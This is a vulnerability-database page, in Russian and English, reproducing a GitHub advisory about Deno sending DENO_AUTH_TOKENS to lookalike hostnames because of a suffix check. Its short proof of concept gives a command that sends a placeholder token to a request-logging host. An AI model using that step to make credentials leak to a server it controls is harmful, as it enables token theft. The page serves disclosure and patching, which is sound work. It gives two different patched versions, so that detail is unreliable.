Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-5frw-4rwq-xhcr

Опубликовано: 06 мар. 2024
Источник: github
Github: Прошло ревью
CVSS3: 4.6

Описание

Deno's improper suffix match testing for DENO_AUTH_TOKENS

Summary

Deno improperly checks that an import specifier's hostname is equal to or a child of a token's hostname, which can cause tokens to be sent to servers they shouldn't be sent to. An auth token intended for example.com may be sent to notexample.com.

Details

auth_tokens.rs uses a simple ends_with check, which matches www.deno.land to a deno.land token as intended, but also matches im-in-ur-servers-attacking-ur-deno.land to deno.land tokens.

PoC

  • Set up a server that logs requests. RequestBin will do. For example, denovulnpoc.example.com.
  • Run DENO_AUTH_TOKENS=a1b2c3d4e5f6@left-truncated.domain deno run https://not-a-left-truncated.domain. For example, DENO_AUTH_TOKENS=a1b2c3d4e5f6@poc.example.com deno run https://denovulnpoc.example.com
  • Observe that the token intended only for the truncated domain is sent to the full domain

Impact

What kind of vulnerability is it? Who is impacted? Anyone who uses DENO_AUTH_TOKENS and imports potentially untrusted code is affected.

Пакеты

Наименование

deno

rust
Затронутые версииВерсия исправления

>= 1.8.0, < 1.40.4

1.40.4

EPSS

Процентиль: 69%
0.00609
Низкий

4.6 Medium

CVSS3

Дефекты

CWE-20

Связанные уязвимости

CVSS3: 4.6
nvd
почти 2 года назад

Deno is a JavaScript, TypeScript, and WebAssembly runtime. Starting in version 1.8.0 and prior to version 1.40.4, Deno improperly checks that an import specifier's hostname is equal to or a child of a token's hostname, which can cause tokens to be sent to servers they shouldn't be sent to. An auth token intended for `example[.]com` may be sent to `notexample[.]com`. Anyone who uses DENO_AUTH_TOKENS and imports potentially untrusted code is affected. Version 1.40.0 contains a patch for this issue

EPSS

Процентиль: 69%
0.00609
Низкий

4.6 Medium

CVSS3

Дефекты

CWE-20